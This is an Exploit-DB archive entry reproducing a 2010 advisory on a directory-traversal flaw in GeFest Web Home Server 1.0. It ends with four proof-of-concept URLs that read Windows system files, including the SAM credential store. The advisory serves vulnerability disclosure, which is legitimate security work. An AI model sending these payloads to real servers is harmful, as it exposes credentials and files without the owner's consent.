GeFest Web Home Server 1.0 - Directory Traversal

EDB-ID:

33611

CVE:

N/A


Author:

Markot

Type:

remote


Platform:

Windows

Date:

2010-02-08


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/38141/info

Gefest Web Home Server is prone to a remote directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.

Gefest Web Home Server 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/\../\../\../WINDOWS\SYSTEM32\calc.exe
http://www.example.com/\../\../\../WINDOWS\SYSTEM32\config\sam
http://www.example.com/\../\../\../WINDOWS\SYSTEM32
http://www.example.com/\../\../\../boot.ini